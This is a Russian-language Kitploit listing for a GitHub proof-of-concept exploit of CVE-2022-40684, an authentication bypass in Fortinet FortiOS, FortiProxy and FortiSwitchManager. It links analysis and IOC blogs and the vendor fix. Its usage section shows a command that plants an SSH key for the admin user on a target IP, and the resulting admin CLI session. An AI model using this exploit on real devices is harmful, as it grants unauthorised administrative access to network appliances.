Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-40684 | Kitploit
Инструменты/GitHubGitHub/puckiestyle/cve-2022-40684
Анализ уязвимостейЭксплуатацияВеб-безопасностьСетевая безопасностьТестирование на ПроникновениеАутентификация
GitHubpuckiestyle/cve-2022-40684

CVE-2022-40684

Репозиторий
3 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-40684

POC для CVE-2022-40684, затрагивающий устройства Fortinet FortiOS, FortiProxy и FortiSwitchManager.

Технический анализ

Технический анализ первопричины уязвимости можно найти в нашем блоге: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

Индикаторы компрометации

Для анализа журналов Fortinet на предмет индикаторов компрометации и сведений о том, как включить более подробное журналирование, ознакомьтесь с нашим блогом об IOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

Краткое описание

Этот POC использует уязвимость обхода аутентификации для установки SSH-ключа для указанного пользователя.

Использование

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

Меры по устранению

Обновитесь до последней версии или примените меры, следуя инструкциям в Fortinet PSIRT

  • https://www.fortiguard.com/psirt/FG-IR-22-377

Подписывайтесь на Horizon3.ai Attack Team в Twitter, чтобы быть в курсе последних исследований в области безопасности:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Отказ от ответственности

Данное программное обеспечение создано исключительно для академических исследований и разработки эффективных методов защиты и не предназначено для атаки на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент